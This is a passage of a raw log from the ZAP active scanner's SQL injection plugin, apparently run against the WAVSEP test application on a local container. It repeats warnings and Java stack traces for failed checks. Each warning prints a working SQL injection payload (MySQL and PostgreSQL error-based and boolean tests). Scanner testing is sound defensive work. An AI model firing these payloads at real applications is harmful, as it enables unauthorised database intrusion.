at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681227 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [(SELECT (CASE WHEN (6353=7016) THEN 6353 ELSE 6353*(SELECT 6353 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://(SELECT (CASE WHEN (6353=7016) THEN 6353 ELSE 6353*(SELECT 6353 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:706) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681227 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ AND (SELECT 4630 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(4630=4630,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http:// AND (SELECT 4630 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(4630=4630,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681228 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [(SELECT (CASE WHEN (9091=9091) THEN 9091 ELSE 9091*(SELECT 9091 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://(SELECT (CASE WHEN (9091=9091) THEN 9091 ELSE 9091*(SELECT 9091 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:720) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681229 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [') AND (SELECT 6208 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(6208=6208,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ('ENrj'='ENrj] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://') AND (SELECT 6208 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(6208=6208,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ('ENrj'='ENrj at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681229 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [(SELECT (CASE WHEN (6353=7016) THEN 6353 ELSE 6353*(SELECT 6353 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://(SELECT (CASE WHEN (6353=7016) THEN 6353 ELSE 6353*(SELECT 6353 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:737) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681230 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [' AND (SELECT 7444 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(7444=7444,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'ajOZ'='ajOZ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://' AND (SELECT 7444 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(7444=7444,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'ajOZ'='ajOZ at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681230 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt) AND (SELECT 1958 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(1958=1958,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (5385=5385] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt) AND (SELECT 1958 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(1958=1958,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (5385=5385 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681231 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [%' AND (SELECT 7357 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(7357=7357,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://%' AND (SELECT 7357 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(7357=7357,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681232 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ AND (SELECT 2005 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(2005=2005,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- eyjt] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http:// AND (SELECT 2005 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(2005=2005,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- eyjt at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681233 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt AND (SELECT 7096 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(7096=7096,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt AND (SELECT 7096 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(7096=7096,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681233 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [) AND 4832=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (4832=4832) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC) AND (7921=7921] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://) AND 4832=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (4832=4832) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC) AND (7921=7921 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681235 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt') AND (SELECT 1452 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(1452=1452,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ('IUgl'='IUgl] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt') AND (SELECT 1452 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(1452=1452,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ('IUgl'='IUgl at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681235 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ AND 5761=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (5761=5761) THEN 1 